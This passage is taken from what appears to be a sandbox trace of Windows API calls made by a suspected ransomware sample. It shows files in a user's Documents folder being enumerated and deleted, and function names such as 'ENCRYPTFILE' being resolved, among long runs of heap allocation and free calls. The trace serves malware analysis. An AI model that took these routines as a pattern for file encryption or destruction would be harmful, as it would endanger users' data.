(HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0075.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0075.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0075.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0075.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2270 [0075.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9de8 [0075.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0075.573] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\59kI0eZovuo4vI8.docx", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\59kI0eZovuo4vI8.docx", lpFilePart=0x0) returned 0x2e [0075.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43596c0 [0075.573] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\59kI0eZovuo4vI8.docx" (normalized: "c:\\users\\fd1hvy\\documents\\59ki0ezovuo4vi8.docx")) returned 0x20 [0075.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0075.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2140 [0075.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0075.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22e0 [0075.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0075.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0075.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0075.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0075.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0075.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0075.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43597f8 [0075.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0075.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0075.574] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\59kI0eZovuo4vI8.docx", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf873c8e0, ftCreationTime.dwHighDateTime=0x1d581e1, ftLastAccessTime.dwLowDateTime=0x4b1fe6e0, ftLastAccessTime.dwHighDateTime=0x1d5cfe5, ftLastWriteTime.dwLowDateTime=0x4b1fe6e0, ftLastWriteTime.dwHighDateTime=0x1d5cfe5, nFileSizeHigh=0x0, nFileSizeLow=0x6823, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="59kI0eZovuo4vI8.docx", cAlternateFileName="59KI0E~1.DOC")) returned 0x41ac140 [0075.574] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\59kI0eZovuo4vI8.docx" (normalized: "c:\\users\\fd1hvy\\documents\\59ki0ezovuo4vi8.docx")) returned 1 [0075.577] FindNextFileW (in: hFindFile=0x41ac140, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf873c8e0, ftCreationTime.dwHighDateTime=0x1d581e1, ftLastAccessTime.dwLowDateTime=0x4b1fe6e0, ftLastAccessTime.dwHighDateTime=0x1d5cfe5, ftLastWriteTime.dwLowDateTime=0x4b1fe6e0, ftLastWriteTime.dwHighDateTime=0x1d5cfe5, nFileSizeHigh=0x0, nFileSizeLow=0x6823, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="59kI0eZovuo4vI8.docx", cAlternateFileName="59KI0E~1.DOC")) returned 0 [0075.578] FindClose (in: hFindFile=0x41ac140 | out: hFindFile=0x41ac140) returned 1 [0075.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21e0 [0075.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0075.578] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0075.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf590 [0075.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2270 [0075.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0075.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c98f0 [0075.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0075.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9908 [0075.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22e0 [0075.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0075.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9920 [0075.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0075.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0075.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2230 [0075.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9920 [0075.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb0) returned 0x42d9438 [0075.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9920 [0075.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0075.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9938 [0075.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0075.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0075.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0075.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0075.579] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0075.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0075.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0075.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0075.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2220 [0075.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5b8 [0075.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0075.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22e0 [0075.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0075.579] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\AGO5jVFwME.pptx", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17e287a0, ftCreationTime.dwHighDateTime=0x1d5b731, ftLastAccessTime.dwLowDateTime=0x1212f6b0, ftLastAccessTime.dwHighDateTime=0x1d572fe, ftLastWriteTime.dwLowDateTime=0x1212f6b0, ftLastWriteTime.dwHighDateTime=0x1d572fe, nFileSizeHigh=0x0, nFileSizeLow=0x11972, dwReserved0=0x10100c0, dwReserved1=0x8, cFileName="AGO5jVFwME.pptx", cAlternateFileName="AGO5JV~1.PPT")) returned 0x41ac140 [0075.579] FindClose (in: hFindFile=0x41ac140 | out: hFindFile=0x41ac140) returned 1 [0075.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22e0 [0075.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0075.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0075.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0075.579] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0075.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0075.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2230 [0075.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0075.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0075.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2140 [0075.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0075.579] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9d88 [0075.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0075.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0075.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0075.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5b8 [0075.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0075.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0075.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0075.580] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0075.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0075.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0075.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0075.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0075.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0075.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0075.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0075.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0075.580] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0075.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0075.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21d0 [0075.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf770 [0075.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0075.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2140 [0075.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9de8 [0075.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2150 [0075.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0075.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2140 [0075.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2180 [0075.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0075.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2140 [0075.581] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0075.581] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.581] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca778, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0075.581] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\AGO5jVFwME.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\ago5jvfwme.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0075.581] FreeLibrary (hLibModule=0x772d0000) returned 1 [0075.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0075.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0075.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0075.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0075.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0075.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0075.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0075.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0075.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0075.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0075.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0075.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0075.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0075.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0075.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0075.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0075.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0075.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0075.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0075.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0075.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0075.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0075.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0075.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0075.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0075.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0075.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0075.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0075.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0075.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0075.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0075.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0075.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0075.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0075.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0075.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0075.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0075.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0075.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0075.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0075.583] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0075.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e90 | out: hHeap=0x1780000) returned 1 [0075.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0075.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0075.583] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0075.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0075.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0075.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0075.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0075.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0075.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0075.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0075.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0075.583] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0075.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0075.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0075.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0075.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0075.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0075.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0075.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0075.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0075.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0075.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0075.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0075.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0075.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0075.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf518 | out: hHeap=0x1780000) returned 1 [0075.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0075.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0075.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0075.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0075.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0075.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0075.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0075.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b98 | out: hHeap=0x1780000) returned 1 [0075.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0075.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0075.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c08 | out: hHeap=0x1780000) returned 1 [0075.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0075.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0075.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0075.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0075.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0075.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0075.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0075.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0075.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359ba0 | out: hHeap=0x1780000) returned 1 [0075.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0075.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0075.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0075.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0075.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0075.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0075.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0075.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0075.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0075.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0075.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0075.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0075.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0075.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0075.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0075.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0075.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0075.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0075.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0075.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0075.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0075.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9de8 | out: 